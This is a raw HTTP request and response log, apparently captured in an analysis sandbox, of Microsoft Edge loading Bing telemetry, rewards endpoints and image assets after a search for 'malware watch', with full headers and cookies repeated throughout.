GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1255%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1738274627650%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1255%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1738274627650%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
etag: 0x8DCDC65AB4005D8
content-length: 1391
content-type: image/svg+xml
content-md5: YgWAZX6KRbSnuEULjaXNMg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a41a454b-e01e-0054-5833-16001a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=142426
expires: Sat, 01 Feb 2025 13:37:34 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7c7
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
POSThttps://www.bing.com/rewardsapp/ncheader?ver=53219865&IID=SERP.5055&IG=69579D85EA2D4E95B5358DAB8D3A2EA2msedge.exeRemote address:88.221.135.16:443RequestPOST /rewardsapp/ncheader?ver=53219865&IID=SERP.5055&IG=69579D85EA2D4E95B5358DAB8D3A2EA2 HTTP/2.0
host: www.bing.com
content-length: 4
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCDC64A18F365B
content-length: 671
content-type: image/svg+xml
content-md5: 2e0aQjQvN2lVcUGQcPjoGA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 08fd2788-101e-0005-299e-161eef000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=164739
expires: Sat, 01 Feb 2025 19:49:27 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7c3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
POSThttps://www.bing.com/rewardsapp/reportActivity?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&IID=SERP.5065&q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531msedge.exeRemote address:88.221.135.16:443RequestPOST /rewardsapp/reportActivity?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&IID=SERP.5065&q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531 HTTP/2.0
host: www.bing.com
content-length: 162
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCDC5EE1BFCC0A
content-length: 282
content-type: image/svg+xml
content-md5: 44eVtjQVTsH/Qca82lTuUg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 73d327a3-201e-006b-142e-16b7c6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=85486
expires: Fri, 31 Jan 2025 21:48:34 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7c5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.16:443RequestGET /rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DA7EE519EF54EF
akamai-grn: 0.19fd4817.1699775190.19e2dda6
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 726
content-type: image/svg+xml
content-md5: ZgHkolq4RyA+EBWzJRSxbA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d46b8e76-f01e-0020-517e-0a9bf6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.1efd4817.1701123842.3b4e7f5b
cache-control: public, no-transform, max-age=1415200
expires: Sun, 16 Feb 2025 07:10:28 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7d2
timing-allow-origin: *
-
Remote address:88.221.135.16:443RequestGET /rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCDC6089E98574
content-length: 1111
content-type: image/svg+xml
content-md5: wEyINKyRgCGG5s5neuSonQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 03b9bc25-601e-000a-8048-17f319000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=310023
expires: Mon, 03 Feb 2025 12:10:51 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7d3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.16:443RequestGET /rp/Fsa_OI0AplCnVoXGca8ALOo0S0s.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCDC65ED9B19A0
akamai-grn: 0.60ba1302.1737441679.97e20061
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4409
content-type: image/jpeg
content-md5: qYoIvbmbhCLJ3J1v3ZOHww==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0123ab47-601e-0001-11da-15eb6d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=52527
expires: Fri, 31 Jan 2025 12:39:15 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7d7
timing-allow-origin: *
-
Remote address:88.221.135.16:443RequestGET /rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCDC650FC3D927
content-length: 3791
content-type: image/jpeg
content-md5: KZpHmi9/HzDQlUXKjMXRYg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: caf5029c-101e-0063-5c90-15acb5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=175422
expires: Sat, 01 Feb 2025 22:47:30 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7d4
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.16:443RequestGET /rp/kiGH9ukZK6Q4hvtDtwwVc1yvueg.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCDC5D4C424AE8
content-length: 5387
content-type: image/jpeg
content-md5: adFid0+JT/i5IDMON2t6Yg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 233d1204-101e-0068-1d1a-16b4c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=108411
expires: Sat, 01 Feb 2025 04:10:39 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7d5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.16:443RequestGET /rp/KC_nX2_tPPyFvVw1RK20Yu1FyDk.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
